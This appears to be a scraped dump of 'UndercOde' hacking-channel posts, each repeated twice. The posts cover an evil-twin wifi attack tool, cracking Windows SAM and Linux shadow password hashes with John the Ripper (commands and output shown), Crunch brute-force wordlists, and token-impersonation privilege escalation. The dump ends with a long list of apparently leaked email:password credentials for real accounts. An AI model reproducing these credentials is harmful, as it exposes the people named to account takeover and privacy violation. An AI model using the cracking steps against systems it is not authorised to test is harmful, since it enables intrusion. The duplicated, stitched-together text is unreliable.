β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ updates Wifi hack 2019 automate various wireless networks
twitter.com/UndercOdeTC
π¦Features :
1) Capture victims' traffic.
2) MAC address spoofing.
3) Set-up honeypot and evil twin attacks.
4) Show the list of in range access points.
5) Wireless adapter|card|dongle power amplification.
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/aress31/wirespy
2) go dir
3) chmod +x wirespy.sh
4) Run the script with root privileges:
> sudo ./wirespy.sh
Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack
π¦ Commands:
clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status
> Compatible with rooted Termux
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ updates Wifi hack 2019 automate various wireless networks
twitter.com/UndercOdeTC
π¦Features :
1) Capture victims' traffic.
2) MAC address spoofing.
3) Set-up honeypot and evil twin attacks.
4) Show the list of in range access points.
5) Wireless adapter|card|dongle power amplification.
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/aress31/wirespy
2) go dir
3) chmod +x wirespy.sh
4) Run the script with root privileges:
> sudo ./wirespy.sh
Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack
π¦ Commands:
clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status
> Compatible with rooted Termux
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Cracking Windows User Passwords
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
1) the user name and password of the Windows system are stored in a SAM (Security Account Manager) file
> In Windows systems based on the NT kernel, including Windows 7 and later versions,
2) this file is saved in the "C: \ Windows \ System32 \ Config" directory. For security reasons, Microsoft has added some extra security measures to protect this file. First, after the operating system starts, the SAM file will be locked at the same time. This means that the user cannot open or copy the SAM file while the operating system is running. In addition to locking, the entire SAM file is encrypted and invisible.
3) Use John the Ripper tool to crack Windows user password.
a) Check the hard drive in the current system
> fdisk -l
The output shows that there is a disk in the current system and there is only one partition. The file system type is NTFS, which is also the disk that is stored in the Windows system.
b) Mount the hard drive. The execution command is as follows:
root@kali:~# mkdir /sda1
root@kali:~# mount /dev/sda1 /sda1/ /dev/sda1
After executing the above command, there is no output information.
c) Switch directories and enter the location of the Windows SAM file. The execution command is as follows:
root@kali:~# cd /sda1/WINDOWS/system32/config/
In this directory, you can see the SAM file.
d) Use SamDump2 to extract the SAM file. The execution command is as follows:
root@kali:/sda1/WINDOWS/system32/config# samdump2 utc system > /root/hash.txt
You can see from the output that the SAM file is extracted. Redirected the contents of the file to the /root/hash.txt file.
e) Run the john command to implement a password attack. The execution command is as follows:
root@kali:/sda1/WINDOWS/system32/config# /usr/sbin/john /root/hash.txt --format=nt
Created directory: /root/.undercode
Loaded 6 password hashes with no
different salts (NT MD4 [128/128 SSE2 + 32/32])
(Guest)
guesses: 4 time: 0:00:03:13 0.09% (3) (ETA: Mon May 12 06:46:42 2014) c/s: 152605K trying: 2KRIN.P - 2KRIDY8
guesses: 4 time: 0:00:04:26 0.13% (3) (ETA: Mon May 12 04:02:53 2014) c/s: 152912K trying: GR0KUHI - GR0KDN1
guesses: 4 time: 0:00:04:27 0.13% (3) (ETA: Mon May 12 04:15:42 2014) c/s: 152924K trying: HKCUUHT - HKCUGDS
THAT IT !
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Cracking Windows User Passwords
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
1) the user name and password of the Windows system are stored in a SAM (Security Account Manager) file
> In Windows systems based on the NT kernel, including Windows 7 and later versions,
2) this file is saved in the "C: \ Windows \ System32 \ Config" directory. For security reasons, Microsoft has added some extra security measures to protect this file. First, after the operating system starts, the SAM file will be locked at the same time. This means that the user cannot open or copy the SAM file while the operating system is running. In addition to locking, the entire SAM file is encrypted and invisible.
3) Use John the Ripper tool to crack Windows user password.
a) Check the hard drive in the current system
> fdisk -l
The output shows that there is a disk in the current system and there is only one partition. The file system type is NTFS, which is also the disk that is stored in the Windows system.
b) Mount the hard drive. The execution command is as follows:
root@kali:~# mkdir /sda1
root@kali:~# mount /dev/sda1 /sda1/ /dev/sda1
After executing the above command, there is no output information.
c) Switch directories and enter the location of the Windows SAM file. The execution command is as follows:
root@kali:~# cd /sda1/WINDOWS/system32/config/
In this directory, you can see the SAM file.
d) Use SamDump2 to extract the SAM file. The execution command is as follows:
root@kali:/sda1/WINDOWS/system32/config# samdump2 utc system > /root/hash.txt
You can see from the output that the SAM file is extracted. Redirected the contents of the file to the /root/hash.txt file.
e) Run the john command to implement a password attack. The execution command is as follows:
root@kali:/sda1/WINDOWS/system32/config# /usr/sbin/john /root/hash.txt --format=nt
Created directory: /root/.undercode
Loaded 6 password hashes with no
different salts (NT MD4 [128/128 SSE2 + 32/32])
(Guest)
guesses: 4 time: 0:00:03:13 0.09% (3) (ETA: Mon May 12 06:46:42 2014) c/s: 152605K trying: 2KRIN.P - 2KRIDY8
guesses: 4 time: 0:00:04:26 0.13% (3) (ETA: Mon May 12 04:02:53 2014) c/s: 152912K trying: GR0KUHI - GR0KDN1
guesses: 4 time: 0:00:04:27 0.13% (3) (ETA: Mon May 12 04:15:42 2014) c/s: 152924K trying: HKCUUHT - HKCUGDS
THAT IT !
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING COMPANY (@UnderCodeTC) | Twitter
The latest Tweets from UNDERCODE TESTING COMPANY (@UnderCodeTC). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking Linux User Passwords
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Cracking a Linux password is basically similar to cracking a Windows password, with only one difference in the process. Linux systems do not use the SAM folder to hold password hashes. The Linux system includes the encrypted password hash in a file called shadow, whose absolute path is / etc / shadow.
2) However, before using the John the Ripper to crack the / etc / shadow file, you also need the / etc / passwd file. This is the same reason that extracting the Windows password hash requires the system file and the SAM file. John the Ripper comes with a feature that combines shadow and passwd files so that you can use this tool to crack user passwords on Linux systems. This section will introduce methods to crack Linux user passwords.
3) Use John the Ripper tool to crack Linux user password. The specific operation steps are shown below.
(1) Use unshadow to extract the password hash. The execution command is as follows:
root@kali:~# unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt
After executing the above command, the / etc / passwd / file is combined with the / etc / shadow / file to generate a file called linux_hashes.txt, which is stored in the / tmp / directory.
(2) Crack the Linux user password. The execution command is as follows:
root@kali:~# john --format=crypt --show /tmp/linux_hashes.txt
root:123456:0:0:root:/root:/bin/bash
bob:123456:1000:1001::/home/bob:/bin/sh
alice:123456:1001:1002::/home/alice:/bin/sh
3 password hashes cracked, 0 left
(3)From the output, you can see that there are three users in the current system and their passwords are 123456.
270-01Note: Before using John the Ripper to start cracking Linux passwords, you need to use a version of John the Ripper that supports cracking different types of password hashes. If you use the wrong version or use the unpatched John the Ripper, the program will return the error message No password hashes loaded. Most modern Linux systems use SHA hash encryption algorithms to save passwords.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking Linux User Passwords
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Cracking a Linux password is basically similar to cracking a Windows password, with only one difference in the process. Linux systems do not use the SAM folder to hold password hashes. The Linux system includes the encrypted password hash in a file called shadow, whose absolute path is / etc / shadow.
2) However, before using the John the Ripper to crack the / etc / shadow file, you also need the / etc / passwd file. This is the same reason that extracting the Windows password hash requires the system file and the SAM file. John the Ripper comes with a feature that combines shadow and passwd files so that you can use this tool to crack user passwords on Linux systems. This section will introduce methods to crack Linux user passwords.
3) Use John the Ripper tool to crack Linux user password. The specific operation steps are shown below.
(1) Use unshadow to extract the password hash. The execution command is as follows:
root@kali:~# unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt
After executing the above command, the / etc / passwd / file is combined with the / etc / shadow / file to generate a file called linux_hashes.txt, which is stored in the / tmp / directory.
(2) Crack the Linux user password. The execution command is as follows:
root@kali:~# john --format=crypt --show /tmp/linux_hashes.txt
root:123456:0:0:root:/root:/bin/bash
bob:123456:1000:1001::/home/bob:/bin/sh
alice:123456:1001:1002::/home/alice:/bin/sh
3 password hashes cracked, 0 left
(3)From the output, you can see that there are three users in the current system and their passwords are 123456.
270-01Note: Before using John the Ripper to start cracking Linux passwords, you need to use a version of John the Ripper that supports cracking different types of password hashes. If you use the wrong version or use the unpatched John the Ripper, the program will return the error message No password hashes loaded. Most modern Linux systems use SHA hash encryption algorithms to save passwords.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crunch tools -debian-parrot-kali tools :
twitter.com/UndercOdeTc
π¦ ππΌππ πππΈβπ :
a) Crunch is a tool for creating password dictionaries, which is usually used for brute force cracking. Passwords generated using the Crunch tool can be sent to a terminal, a file, or another program. The following will introduce the creation of a password dictionary using the Crunch tool> https://github.com/crunchsec/crunch
b) Generate a dictionary using Crunch. The specific operation steps are shown below.
1) Start the crunch command. The execution command is shown below.
root@kali:~# crunch
After executing the above command, the following information will be output:
2) Crunch can create a wordlist based on criteria you specify. The outout from crunch can be sent to the screen, file, or to another program.
Usage: crunch <min> <max> [options]
where min and max are numbers
Please refer to the man page for instructions and examples on how to use crunch.
3) The output shows the version and syntax of the crunch command. The syntax for generating a password using the crunch command is as follows:
4) crunch [minimum length] [maximum length] [character set] [options]
The options commonly used by the crunch command are shown below.
-o: Used to specify the location of the output dictionary file.
-b: specifies the maximum number of bytes written to the file. The size can be specified in KB, MB, or GB, but must be used with the -o START option.
-t: Set the special format used.
-l: This option is used to identify some characters of the placeholder when the -t option specifies @,%, or ^.
5) Create a password list file and save it on the desktop. Among them, the minimum length of the generated password list is 8 and the maximum length is 10, and ABCDEFGabcdefg0123456789 is used as the character set. The execution command is as follows:
root@kali:~# crunch 8 10 ABCDEFGabcdefg0123456789 βo /root/Desktop/
generatedCrunch.txt
Notice: Detected unicode characters. If you are piping crunch output
to another program such as john or aircrack please make sure that program
can handle unicode input.
Do you want to continue? [Y/n] y
Crunch will now generate the following amount of data: 724845943848960 bytes
691266960 MB
675065 GB
659 TB
0 PB
Crunch will now generate the following number of lines: 66155263819776
AAAAAAAA
AAAAAAAB
AAAAAAAC
AAAAAAAD
AAAAAAAE
AAAAAAAF
AAAAAAAG
AAAAAAAa
AAAAAAAb
AAAAAAAc
β¦β¦
AAdb6gFe
AAdb6gFf
AAdb6gFg
AAdb6gF0
AAdb6gF1
AAdb6gF2
AAdb6gF3
AAdb6gF4
AAdb6gF5
From the output information above, you can see that a 659TB large file will be generated, with a total of 66,552,638,976,976 lines. After the execution of the above command is completed, a dictionary file named generatedCrunch.txt will be generated on the desktop. Because there are many passwords generated by combination, it takes a long time.
6) After the above password dictionary file is generated, use the Nano command to open it. The execution command is as follows:
root@kali:~# nano /root/Desktop/generatedCrunch.txt
After executing the above command, the generatedCrunch.txt file will be opened. This file holds all passwords generated using the crunch command.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Crunch tools -debian-parrot-kali tools :
twitter.com/UndercOdeTc
π¦ ππΌππ πππΈβπ :
a) Crunch is a tool for creating password dictionaries, which is usually used for brute force cracking. Passwords generated using the Crunch tool can be sent to a terminal, a file, or another program. The following will introduce the creation of a password dictionary using the Crunch tool> https://github.com/crunchsec/crunch
b) Generate a dictionary using Crunch. The specific operation steps are shown below.
1) Start the crunch command. The execution command is shown below.
root@kali:~# crunch
After executing the above command, the following information will be output:
2) Crunch can create a wordlist based on criteria you specify. The outout from crunch can be sent to the screen, file, or to another program.
Usage: crunch <min> <max> [options]
where min and max are numbers
Please refer to the man page for instructions and examples on how to use crunch.
3) The output shows the version and syntax of the crunch command. The syntax for generating a password using the crunch command is as follows:
4) crunch [minimum length] [maximum length] [character set] [options]
The options commonly used by the crunch command are shown below.
-o: Used to specify the location of the output dictionary file.
-b: specifies the maximum number of bytes written to the file. The size can be specified in KB, MB, or GB, but must be used with the -o START option.
-t: Set the special format used.
-l: This option is used to identify some characters of the placeholder when the -t option specifies @,%, or ^.
5) Create a password list file and save it on the desktop. Among them, the minimum length of the generated password list is 8 and the maximum length is 10, and ABCDEFGabcdefg0123456789 is used as the character set. The execution command is as follows:
root@kali:~# crunch 8 10 ABCDEFGabcdefg0123456789 βo /root/Desktop/
generatedCrunch.txt
Notice: Detected unicode characters. If you are piping crunch output
to another program such as john or aircrack please make sure that program
can handle unicode input.
Do you want to continue? [Y/n] y
Crunch will now generate the following amount of data: 724845943848960 bytes
691266960 MB
675065 GB
659 TB
0 PB
Crunch will now generate the following number of lines: 66155263819776
AAAAAAAA
AAAAAAAB
AAAAAAAC
AAAAAAAD
AAAAAAAE
AAAAAAAF
AAAAAAAG
AAAAAAAa
AAAAAAAb
AAAAAAAc
β¦β¦
AAdb6gFe
AAdb6gFf
AAdb6gFg
AAdb6gF0
AAdb6gF1
AAdb6gF2
AAdb6gF3
AAdb6gF4
AAdb6gF5
From the output information above, you can see that a 659TB large file will be generated, with a total of 66,552,638,976,976 lines. After the execution of the above command is completed, a dictionary file named generatedCrunch.txt will be generated on the desktop. Because there are many passwords generated by combination, it takes a long time.
6) After the above password dictionary file is generated, use the Nano command to open it. The execution command is as follows:
root@kali:~# nano /root/Desktop/generatedCrunch.txt
After executing the above command, the generatedCrunch.txt file will be opened. This file holds all passwords generated using the crunch command.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why We Use Elevation of Privilege ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Elevation of privilege is to increase the lowest privilege of a user to the highest. Often, the users we gain access to may have the lowest permissions.
> However, if you want to perform a penetration attack, you may need the administrator account permissions, so you need to upgrade the permissions. Privilege escalation can be achieved through the use of counterfeit tokens, local privilege escalation, and social engineering. This chapter introduces various methods to elevate user rights.
π¦Uses is
> Use of fake tokens;
> Local privilege elevation attack;
> Use of the Social Engineering Toolkit (SET);
> Attack using SET.
π¦Example Use of fake tokens :
1) Using fake tokens can impersonate another user in a network for various operations, such as elevating user rights, creating users and groups, and so on.
2) The token includes security information for the login session, such as user identification, user group, and user permissions.
3) When a user logs on to a Windows system, it is given an access token as part of its authentication session.
> For example, an intrusive user may need to perform a specific task as a domain administrator, and when it uses the token, it can impersonate the domain administrator to work. When it finishes processing the task, it usually discards the token permission
4) In this way, the intruder will use this weakness to elevate its access rights. This section will introduce the implementation of counterfeit token attacks under Meterpreter Shell.
and many,any such examples will send later on UndercOde
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why We Use Elevation of Privilege ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> Elevation of privilege is to increase the lowest privilege of a user to the highest. Often, the users we gain access to may have the lowest permissions.
> However, if you want to perform a penetration attack, you may need the administrator account permissions, so you need to upgrade the permissions. Privilege escalation can be achieved through the use of counterfeit tokens, local privilege escalation, and social engineering. This chapter introduces various methods to elevate user rights.
π¦Uses is
> Use of fake tokens;
> Local privilege elevation attack;
> Use of the Social Engineering Toolkit (SET);
> Attack using SET.
π¦Example Use of fake tokens :
1) Using fake tokens can impersonate another user in a network for various operations, such as elevating user rights, creating users and groups, and so on.
2) The token includes security information for the login session, such as user identification, user group, and user permissions.
3) When a user logs on to a Windows system, it is given an access token as part of its authentication session.
> For example, an intrusive user may need to perform a specific task as a domain administrator, and when it uses the token, it can impersonate the domain administrator to work. When it finishes processing the task, it usually discards the token permission
4) In this way, the intruder will use this weakness to elevate its access rights. This section will introduce the implementation of counterfeit token attacks under Meterpreter Shell.
and many,any such examples will send later on UndercOde
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ FreeRDP is a free remote desktop protocol library and clients 2020 updated
>FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Enjoy the freedom of using your software wherever you want, the way you want it, in a world where interoperability can finally liberate your computing experience.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1> official release :
> https://pub.freerdp.com/releases/
2> extract tar -zxvf namefile.tar.gz
3> ./configure
4> make
5> sudo make install
π¦Streaming the Virtual Desktop:
With H.264 desktop streaming, introduced in RDP 10, we now also have new possibilities to transfer the desktop content to the user. We have developed a special load-balancing algorithm that adjusts image quality during streaming, based on current network characteristics. FreeRDPβs network characteristics detection (which is part of the RDP core specification) provides us with all the necessary information about the connectionβs latency and bandwidth. Depending on these parameters we dynamically increase or decrease the quality level of the H.264 encoder. An implementation of the software H.264 encoder backend, using OpenH264, is also part of the FreeRDP library.
π¦ Performance matters:
> As explained earlier, Thincast Workstation provides virtual graphics hardware to the guest that exposes full Direct3D11 support. This means all graphical operations in the guest OS are handled and accelerated by the host GPU. As we want to achieve the best performance possible, it would be a pity to do the H.264 encoding of our virtual desktop in software. Luckily, thanks to FreeRDPβs modular architecture, we were able to plug-in our own hardware encoders and completely offload this work from the CPU. Because every vendor has its own multimedia framework we implemented encoders for all major GPU producers including NVidia, AMD and Intel.
π¦ Tested by UndercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ FreeRDP is a free remote desktop protocol library and clients 2020 updated
>FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Enjoy the freedom of using your software wherever you want, the way you want it, in a world where interoperability can finally liberate your computing experience.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1> official release :
> https://pub.freerdp.com/releases/
2> extract tar -zxvf namefile.tar.gz
3> ./configure
4> make
5> sudo make install
π¦Streaming the Virtual Desktop:
With H.264 desktop streaming, introduced in RDP 10, we now also have new possibilities to transfer the desktop content to the user. We have developed a special load-balancing algorithm that adjusts image quality during streaming, based on current network characteristics. FreeRDPβs network characteristics detection (which is part of the RDP core specification) provides us with all the necessary information about the connectionβs latency and bandwidth. Depending on these parameters we dynamically increase or decrease the quality level of the H.264 encoder. An implementation of the software H.264 encoder backend, using OpenH264, is also part of the FreeRDP library.
π¦ Performance matters:
> As explained earlier, Thincast Workstation provides virtual graphics hardware to the guest that exposes full Direct3D11 support. This means all graphical operations in the guest OS are handled and accelerated by the host GPU. As we want to achieve the best performance possible, it would be a pity to do the H.264 encoding of our virtual desktop in software. Luckily, thanks to FreeRDPβs modular architecture, we were able to plug-in our own hardware encoders and completely offload this work from the CPU. Because every vendor has its own multimedia framework we implemented encoders for all major GPU producers including NVidia, AMD and Intel.
π¦ Tested by UndercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
dpham14@hotmail.com:Iloveudina1 | Expiration = 2019-12-16 13:39:18
hide0324@gmail.com:chinpira0324 | Expiration = 2020-04-21 15:48:10
Kungii0@gmail.com:Hussain123 | Expiration = 2019-11-16 13:51:34
chandarachun@gmail.com:triggahaw1 | Expiration = 2019-09-19 00:47:39
Tylerv667767@gmail.com:That1day2 | Expiration = 2019-12-26 03:53:30
xbones123@hotmail.com:nikolai55 | Expiration = 2019-10-13 09:22:17
razielphisher@gmail.com:Lancas7er | Expiration = 2021-05-28 16:37:13
snakus_raph@hotmail.com:Jurras2c | Expiration = 2021-12-24 13:43:31
dawson.coyle@ccvineland.org:frog1111 | Expiration = 2020-08-29 01:38:58
jester83198@gmail.com:Defender1 | Expiration = 2022-10-05 22:30:23
gibbsharry@hotmail.com:fourteen14 | Expiration = 2022-05-28 11:18:48
sitrikerak@gmail.com:chaosknighta | Expiration = 2019-09-21 10:38:34
andrewcoxfilm@hotmail.com:thehoho1 | Expiration = 2021-01-18 12:44:32
cazer99@gmail.com:Edward99 | Expiration = 2020-05-05 19:00:36
Henry066@hotmail.fr:Henry660 | Expiration = 2022-07-12 15:21:44
patrick_98@live.de:Patrick98 | Expiration = 2022-07-20 16:11:50
jonathan.tarith@gmail.com:Germania4405 | Expiration = 2022-08-08 14:38:16
bcleahy@gmail.com:brendan2 | Expiration = 2019-10-13 21:22:14
philippdeurer@icloud.com:Fcbayern13 | Expiration = 2022-04-25 02:50:44
delaunayalexandre18@gmail.com:Alexandre9 | Expiration = 2019-10-19 10:06:47
toriol64@gmail.com:tato6446 | Expiration = 2020-05-11 18:00:09
joelstav82@gmail.com:Joelstav1 | Expiration = 2020-05-15 07:11:12
deathmachine4888@gmail.com:Fartfart1 | Expiration = 2022-01-30 00:08:24
joel_chong84@hotmail.com:s9427833c | Expiration = 2019-10-01 18:27:04
Andersson.gustav@hotmail.com:Kattmat22 | Expiration = 2022-05-18 07:02:39
alisaydam46@hotmail.com:saydam46 | Expiration = 2020-05-01 09:33:21
kylef97@hotmail.co.uk:william22 | Expiration = 2021-04-19 08:41:15
qualm17@aol.com:Onimusha1 | Expiration = 2022-08-27 21:25:55
blue.kry@gmail.com:Stabilo1 | Expiration = 2022-05-13 18:03:13
Eirik.Aanstad@gmail.com:Kjf9w9er | Expiration = 2019-09-29 07:05:04
aman-parmar25@hotmail.com:Likeaboss1 | Expiration = 2022-02-24 10:37:06
hamed.mohamed.pro@gmail.com:Momox93120 | Expiration = 2022-01-08 02:08:52
eeva.valtokari@hotmail.com:Kiriquu1 | Expiration = 2019-09-27 20:24:08
gtonsei101@gmail.com:angelwing7 | Expiration = 2020-06-14 21:45:47
randysesariojr@gmail.com:ninja3221 | Expiration = 2020-08-02 13:59:15
pinkyshaffer@gmail.com:homer333 | Expiration = 2020-06-01 00:00:00
jenjenfear2@gmail.com:Pinkpink22 | Expiration = 2022-01-05 12:01:03
auglvig@msn.com:Viviogdan1 | Expiration = 2019-10-13 20:43:39
gaving@talktalk.net:trybe1745 | Expiration = 2022-03-16 12:08:18
dl_blr@hotmail.com:kimecW35 | Expiration = 2022-09-12 17:09:36
one4daniel@gmail.com:anthony33 | Expiration = 2019-09-29 20:50:11
reparaudio@laposte.net:michto288 | Expiration = 2020-04-09 14:18:05
phelo70@ntlworld.com:f2sidecars | Expiration = 2020-09-10 20:06:43
nschwitters@yahoo.com:nickrs11 | Expiration = 2022-06-03 13:20:44
liamodwyer85@gmail.com:kilteely619 | Expiration = 2021-11-01 19:40:33
mrecord25@gmail.com:Mcgwire25 | Expiration = 2020-06-06 22:24:39
marslevandreas@gmail.com:Gvd78mns1 | Expiration = 2022-06-15 12:47:36
dbrown1991@comcast.net:Ferrium2010 | Expiration = 2020-07-23 22:15:34
naif.s.k@msn.com:naif409409409 | Expiration = 2020-06-27 22:55:20
jakob.vestbjerg@hotmail.dk:Jalle123 | Expiration = 2022-07-10 12:27:17
milind892002@gmail.com:m3030351 | Expiration = 2022-05-21 03:01:01
anthony.n.1989@gmail.com:vegeta67 | Expiration = 2022-04-21 23:52:05
thanatoshan@gmail.com:wocaonima123 | Expiration = 2020-06-07 12:05:20
shaomengda@hotmail.com:123456qQ | Expiration = 2022-03-13 17:42:52
mathew.dimmock@gmail.com:Splatman18 | Expiration = 2020-06-08 06:30:50
mike@bommaritodesign.com:Sweatb22 | Expiration = 2021-11-16 02:55:03
quentonh234@gmail.com:Wordbla6 | Expiration = 2022-06-18 23:38:36
philyew@live.com:deion211 | Expiration = 2021-02-20 23:46:04
reverendphu@gmail.com:Phugod123 | Expiration = 2019-09-18 22:48:36
hide0324@gmail.com:chinpira0324 | Expiration = 2020-04-21 15:48:10
Kungii0@gmail.com:Hussain123 | Expiration = 2019-11-16 13:51:34
chandarachun@gmail.com:triggahaw1 | Expiration = 2019-09-19 00:47:39
Tylerv667767@gmail.com:That1day2 | Expiration = 2019-12-26 03:53:30
xbones123@hotmail.com:nikolai55 | Expiration = 2019-10-13 09:22:17
razielphisher@gmail.com:Lancas7er | Expiration = 2021-05-28 16:37:13
snakus_raph@hotmail.com:Jurras2c | Expiration = 2021-12-24 13:43:31
dawson.coyle@ccvineland.org:frog1111 | Expiration = 2020-08-29 01:38:58
jester83198@gmail.com:Defender1 | Expiration = 2022-10-05 22:30:23
gibbsharry@hotmail.com:fourteen14 | Expiration = 2022-05-28 11:18:48
sitrikerak@gmail.com:chaosknighta | Expiration = 2019-09-21 10:38:34
andrewcoxfilm@hotmail.com:thehoho1 | Expiration = 2021-01-18 12:44:32
cazer99@gmail.com:Edward99 | Expiration = 2020-05-05 19:00:36
Henry066@hotmail.fr:Henry660 | Expiration = 2022-07-12 15:21:44
patrick_98@live.de:Patrick98 | Expiration = 2022-07-20 16:11:50
jonathan.tarith@gmail.com:Germania4405 | Expiration = 2022-08-08 14:38:16
bcleahy@gmail.com:brendan2 | Expiration = 2019-10-13 21:22:14
philippdeurer@icloud.com:Fcbayern13 | Expiration = 2022-04-25 02:50:44
delaunayalexandre18@gmail.com:Alexandre9 | Expiration = 2019-10-19 10:06:47
toriol64@gmail.com:tato6446 | Expiration = 2020-05-11 18:00:09
joelstav82@gmail.com:Joelstav1 | Expiration = 2020-05-15 07:11:12
deathmachine4888@gmail.com:Fartfart1 | Expiration = 2022-01-30 00:08:24
joel_chong84@hotmail.com:s9427833c | Expiration = 2019-10-01 18:27:04
Andersson.gustav@hotmail.com:Kattmat22 | Expiration = 2022-05-18 07:02:39
alisaydam46@hotmail.com:saydam46 | Expiration = 2020-05-01 09:33:21
kylef97@hotmail.co.uk:william22 | Expiration = 2021-04-19 08:41:15
qualm17@aol.com:Onimusha1 | Expiration = 2022-08-27 21:25:55
blue.kry@gmail.com:Stabilo1 | Expiration = 2022-05-13 18:03:13
Eirik.Aanstad@gmail.com:Kjf9w9er | Expiration = 2019-09-29 07:05:04
aman-parmar25@hotmail.com:Likeaboss1 | Expiration = 2022-02-24 10:37:06
hamed.mohamed.pro@gmail.com:Momox93120 | Expiration = 2022-01-08 02:08:52
eeva.valtokari@hotmail.com:Kiriquu1 | Expiration = 2019-09-27 20:24:08
gtonsei101@gmail.com:angelwing7 | Expiration = 2020-06-14 21:45:47
randysesariojr@gmail.com:ninja3221 | Expiration = 2020-08-02 13:59:15
pinkyshaffer@gmail.com:homer333 | Expiration = 2020-06-01 00:00:00
jenjenfear2@gmail.com:Pinkpink22 | Expiration = 2022-01-05 12:01:03
auglvig@msn.com:Viviogdan1 | Expiration = 2019-10-13 20:43:39
gaving@talktalk.net:trybe1745 | Expiration = 2022-03-16 12:08:18
dl_blr@hotmail.com:kimecW35 | Expiration = 2022-09-12 17:09:36
one4daniel@gmail.com:anthony33 | Expiration = 2019-09-29 20:50:11
reparaudio@laposte.net:michto288 | Expiration = 2020-04-09 14:18:05
phelo70@ntlworld.com:f2sidecars | Expiration = 2020-09-10 20:06:43
nschwitters@yahoo.com:nickrs11 | Expiration = 2022-06-03 13:20:44
liamodwyer85@gmail.com:kilteely619 | Expiration = 2021-11-01 19:40:33
mrecord25@gmail.com:Mcgwire25 | Expiration = 2020-06-06 22:24:39
marslevandreas@gmail.com:Gvd78mns1 | Expiration = 2022-06-15 12:47:36
dbrown1991@comcast.net:Ferrium2010 | Expiration = 2020-07-23 22:15:34
naif.s.k@msn.com:naif409409409 | Expiration = 2020-06-27 22:55:20
jakob.vestbjerg@hotmail.dk:Jalle123 | Expiration = 2022-07-10 12:27:17
milind892002@gmail.com:m3030351 | Expiration = 2022-05-21 03:01:01
anthony.n.1989@gmail.com:vegeta67 | Expiration = 2022-04-21 23:52:05
thanatoshan@gmail.com:wocaonima123 | Expiration = 2020-06-07 12:05:20
shaomengda@hotmail.com:123456qQ | Expiration = 2022-03-13 17:42:52
mathew.dimmock@gmail.com:Splatman18 | Expiration = 2020-06-08 06:30:50
mike@bommaritodesign.com:Sweatb22 | Expiration = 2021-11-16 02:55:03
quentonh234@gmail.com:Wordbla6 | Expiration = 2022-06-18 23:38:36
philyew@live.com:deion211 | Expiration = 2021-02-20 23:46:04
reverendphu@gmail.com:Phugod123 | Expiration = 2019-09-18 22:48:36
rosswinter1986@gmail.com:Hobbit14 | Expiration = 2019-10-02 20:47:11
jourdahndavid@gmail.com:arya118251 | Expiration = 2019-09-29 15:42:48
hodge45@gmail.com:Chewbacca45 | Expiration = 2022-08-09 00:31:07
crow.stephen@gmail.com:savior11 | Expiration = 2020-08-08 04:05:16
ransley77@gmail.com:dingo101 | Expiration = 2020-01-30 13:20:37
tsherman219@gmail.com:tristan123 | Expiration = 2022-02-03 17:46:39
jaredgrant101@gmail.com:Alexander123 | Expiration = 2020-04-21 22:43:48
sbarr531@gmail.com:99Basketball | Expiration = 2021-03-12 16:58:25
starjosie777@gmail.com:Kitty101 | Expiration = 2021-05-25 14:49:38
herregud1989@outlook.com:Pellekanin1 | Expiration = 2019-09-30 04:25:16
rjeff24@gmail.com:Password90 | Expiration = 2022-04-30 18:14:06
troynickerson@gmail.com:FuckTh1s | Expiration = 2022-06-26 02:42:51
jft.jenkins@gmail.com:07091998Jft | Expiration = 2019-11-09 00:55:57
jcrouch764@gmail.com:thunder3 | Expiration = 2020-08-14 00:03:17
noodlejon@yahoo.com:Balto1925 | Expiration = 2019-11-23 02:35:37
benz_47@hotmail.com:1qaz@WSX | Expiration = 2020-07-08 01:09:16
nico.grusse@gmail.com:Tgdobyboloss94! | Expiration = 2022-09-09 13:38:12
